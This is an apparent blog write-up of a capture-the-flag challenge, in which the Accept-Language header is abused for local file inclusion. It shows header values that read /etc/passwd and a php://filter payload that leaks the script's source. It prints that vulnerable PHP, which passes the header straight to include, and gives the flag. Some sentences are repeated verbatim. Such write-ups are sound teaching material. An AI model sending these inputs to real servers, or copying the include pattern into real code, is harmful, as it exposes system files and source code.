The page shows some text from wikipedia (or from somewhere else, I don't care), the interesting thing is that it shows "Language was detect automatically :)" in the end of the text.
It seems like a hint, so let's try to use Accept-Language header.
First of all, set Accept-language to ru/en, the page will change according to the language selected.
So, let's test it for LFI with Accept-language: /etc/passwd, it will show the contents of /etc/passwd!
It seems like a hint, so let's try to use Accept-Language header.
First of all, set Accept-language to ru/en, the page will change according to the language selected.
So, let's test it for LFI with Accept-language: /etc/passwd, it will show the contents of /etc/passwd!
But there is nothing interesting in /etc/passwd, so let's get the source of the script itself with Accept-language: php://filter/convert.base64-encode/resource=index.php
After decoding base64 we can get the source of script:
After decoding base64 we can get the source of script:
<!doctype html>
<html>
<head>
<style type="text/css">
pre { width: 640px; white-space: normal; text-align: justify;};
</style>
</head>
<body>
<center>
<h2>CTF</h2>
<?php
header('Content-Type: text/html; charset=utf-8');
$flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';
$ok = 0;
foreach(explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $s) {
$l = explode(';', $s)[0];
if (include $l) {
$ok = 1;
break;
}
}
if (!$ok) {
include 'en';
echo 'Language was not detect automatically :(';
} else {
echo 'Language was detect automatically :)';
}
?>
<center>
</body>
</html>
The flag is 5cf27d9bad2fe9d96d2bcf25c3b0bd14
thank u blogger
ReplyDelete